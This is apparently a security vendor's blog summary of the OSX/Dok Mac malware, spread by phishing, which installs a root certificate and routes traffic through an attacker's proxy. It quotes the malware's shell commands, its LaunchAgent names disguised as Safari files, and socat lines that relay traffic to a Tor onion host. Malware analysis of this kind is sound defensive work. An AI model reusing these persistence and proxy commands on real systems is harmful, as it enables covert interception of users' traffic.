OSX Malware – Dok

People often assume that if you’re running OSX, you’re relatively safe from malware. But this is becoming less and less true, as evidenced by a new strain of malware encountered by the Check Point malware research team. This new malware – dubbed OSX/Dok — affects all versions of OSX.

This is the first “major scale” malware directed at Mac owners through a “coordinated email phishing campaign.” The emails are aimed mostly at Europeans, one example being a German-language message from a supposed Swiss official, claiming problems with the target’s tax return.

The malware works by gaining administration privileges in order to install a new root certificate on the user’s system. This enables it to gain access to all communications between the host Mac and the internet, including traffic flowing through connections encrypted with SSL.
Dok
The malware later presents the user with a security message claiming an update is available for the system, for which a password input is required. Following the “update”, the malware gains complete control of admin privileges, adjusts the network settings to divert all outgoing connections through a proxy, and installs additional tools that enable it to perform a man-in-the-middle attack on all traffic.

The malware bundle is contained in a .zip archive named Dokument.zip. It was signed on April 21th 2017 by a “Seven Muller” and the bundle name is Truesteer.AppStore.

Upon execution, the malware will copy itself to the /Users/Shared/ folder, and will then proceed to execute itself from the new location by running the shell commands below:

chmod +x /Users/Shared/AppStore.app …gives all users execute permission
rm -fr “/Users/_%USER%_/Downloads/Dokument.app”…delete the original copy
“/Users/Shared/Appstore.app/Contents/MacOS/AppStore”Dokument…exceute the application

The malware will also install 2 LaunchAgents that will start with system boot, and have the following names:

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.proxy.plist

/Users/_%User%_/Library/LaunchAgents/com.apple.Safari.pac.plist

These LaunchAgents will redirect requests to 127.0.0.1 through the dark web address “paoyu7gub72lykuk.onion”. This is necessary for the previous PAC configuration to work (note that the original configuration looks for the PAC file on the local host 127.0.0.1).

These launchAgents consist of the following BASH commands:

/usr/local/bin/socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:80,socksport=9050

/usr/local/bin/socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:paoyu7gub72lykuk.onion:5588,socksport=9050

As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings. The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim’s traffic and tamper with it in any way they please.

Beware of emails attachments, do not enter your root password when asked by any app. Also, keep an updated copy of Mac Total Security by Max Secure Software.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>